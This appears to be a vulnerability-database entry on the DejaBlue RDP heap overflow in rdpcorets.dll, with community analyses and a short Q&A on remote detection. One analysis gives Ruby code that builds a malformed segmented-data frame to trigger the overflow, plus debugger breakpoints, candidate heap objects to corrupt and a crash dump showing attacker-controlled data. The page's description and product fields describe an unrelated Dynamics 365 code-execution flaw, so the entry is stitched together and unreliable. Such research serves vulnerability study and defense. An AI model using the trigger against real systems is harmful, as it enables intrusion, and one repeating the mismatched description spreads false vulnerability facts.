Very High
DejaBlue, RDP Heap Overflow
DejaBlue, RDP Heap Overflow
Description
A remote code execution vulnerability exists in Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11. An attacker who successfully exploited this vulnerability could gain remote code execution via server-side script execution on the victim server.
An authenticated attacker with privileges to import and export data could exploit this vulnerability by sending a specially crafted file to a vulnerable Dynamics server.
The security update addresses the vulnerability by correcting how Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11 handles user input.
Add Assessment
Technical Analysis
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)
The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2 def build_rdp_data_segment(data) # RDP_DATA_SEGMENT encoded = [data.length + 1].pack("L<") encoded << "\x04" encoded << data end def build_trigger # see [MS-RDPEGFX] section 2.2.5 rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q')) rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment end
An object needs to be created and corrupted, potential candidates are below.
| Object Name | Breakpoint Address | Size | Can Create? |
|---|---|---|---|
| CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
| DecompressRdp8 | rdpcorets+16274a |
0x68 | |
| DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
Relevant Breakpoints
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpycall that copies the buffer to the target and overflows it
rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
- Watch object creation instances
- Watch object creation instances
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
Read Access Violation
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g (138c.13b4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. rdpcorets+0xd9d36: 00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=???????????????? 0:033> k Child-SP RetAddr Call Site 00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36 00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f 00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf 00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190 00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1 00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3 00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22 00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34 0:033> u rdpcorets+0xd9d36: 00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx 00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h] 00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h 00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9 00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d 00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h] 00007fff`a5b79d55 4803ca add rcx,rdx 00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d 0:033> r rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940 rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940 rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450 r8=4141414141414141 r9=0000000000000000 r10=0000000000000007 r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0 r14=0000000000000000 r15=00000050bdccfdc0 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 rdpcorets+0xd9d36: 00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
Technical Analysis
Affects every version of Windows from Windows 7 to Windows 10. A DVC, or Dynamic Virtual Channel, packet needs to be sent with a specially-crafted uncompressed field field value larger than an integer, causing an overflow, according to MalwareTech’s writeup here: https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html
Technical Analysis
This vulnerability was discovered while researchers audited the RDP code from the previous vulnerability, Bluekeep. This vulnerability is likely going to be worse than Bluekeep, as it targets more modern operating systems. The saving grace with Dejablue, as with Bluekeep and even Eternalblue is the complexity of turning the vulnerability into a reliable exploit, as the attacker must successfully trigger the vulnerability, write to kernel memory and to user memory, then execute the code in kernel memory to locate and execute the code in user memory. Without question this is in the ability of nation states and probably even organized crime, but until a public version is released, this will be treated as a zero day by those attackers that posses it. I would be surprised to see a public version of this that works reliably across Windows kernel 10 releases for at least another six to eight weeks (October 2019).
nice
CVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- dynamics 365 for finance and operations 10.0.11
References
Miscellaneous
Do we have enough info here to perform a remote check for exploitable machines (is there a way to test without causing a crash)?
By causing a crash, yes. Without causing a crash, not that I am currently aware of. This is because the DynVC channel does not send meaningful responses to channel write requests, e.g. the server won’t respond that the channel write failed because the data was corrupted.
What might warrant further investigation would be the Server Error Reporting functionality as described in MS-RDPBCGR Section 3.3.5.7. From my limited testing, this wasn’t going to be feasible because bad writes to DynVC channels aren’t reported.